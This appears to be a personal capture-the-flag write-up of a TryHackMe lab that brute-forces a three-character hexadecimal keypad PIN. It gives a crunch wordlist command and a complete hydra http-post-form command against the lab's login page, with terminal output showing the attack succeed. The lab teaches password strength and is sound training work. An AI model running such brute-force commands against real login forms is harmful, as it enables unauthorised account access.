Day 3

This room is a very simple introduction to the tool Hydra which helps in brute forcing.

Learning Objectives

• Password complexity and the number of possible combinations

• How the number of possible combinations affects the feasibility of brute force attacks

• Generating password combinations using crunch

• Trying out passwords automatically using hydra

The room is very straightforward with all the commands given to us already we just need to run them.

After starting the maching and going to the site. We find a keypad like interface

Upon entering a random code we can see it is only a 3 digit pin, should be very quick to brute force.

The numeric keypad shows 16 characters, 0 to 9 and A to F, i.e., the hexadecimal digits. We need to prepare a list of all the PIN codes that match this criteria. We will use Crunch, a tool that generates a list of all possible password combinations based on given criteria. We need to issue the following command:

crunch 3 3 0123456789ABCDEF -o 3digits.txt

The command above specifies the following:

• 3 the first number is the minimum length of the generated password

• 3 the second number is the maximum length of the generated password

• 0123456789ABCDEF is the character set to use to generate the passwords

• -o 3digits.txt saves the output to the 3digits.txt file

┌──(kali㉿kali)-[~/THM/AOC2023/Day3]
└─$ crunch 3 3 0123456789ABCDEF -o 3digits.txt
Crunch will now generate the following amount of data: 16384 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 4096 

crunch: 100% completed generating output

the main login page http://10.10.125.46:8000/pin.php receives the input from the user and sends it to /login.php using the name pin.

These three pieces of information, post, /login.php, and pin, are necessary to set the arguments for Hydra.

We will use hydra to test every possible password that can be put into the system. The command to brute force the above form is:

hydra -l '' -P 3digits.txt -f -v 10.10.125.46 http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000

The command above will try one password after another in the 3digits.txt file.

┌──(kali㉿kali)-[~/THM/AOC2023/Day3]
└─$ hydra -l '' -P 3digits.txt -f -v 10.10.125.46 http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-04 00:54:33
[DATA] max 16 tasks per 1 server, overall 16 tasks, 4096 login tries (l:1/p:4096), ~256 tries per task
[DATA] attacking http-post-form://10.10.125.46:8000/login.php:pin=^PASS^:Access denied
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
.
.
.
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/control.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[8000][http-post-form] host: 10.10.125.46   password: [REDACTED]
[STATUS] attack finished for 10.10.125.46 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-04 00:56:52

We get the PIN for the keypad. Now we just enter it in the Keypad.

Now we just need to click on Unlock Door and it will give us our flag.

---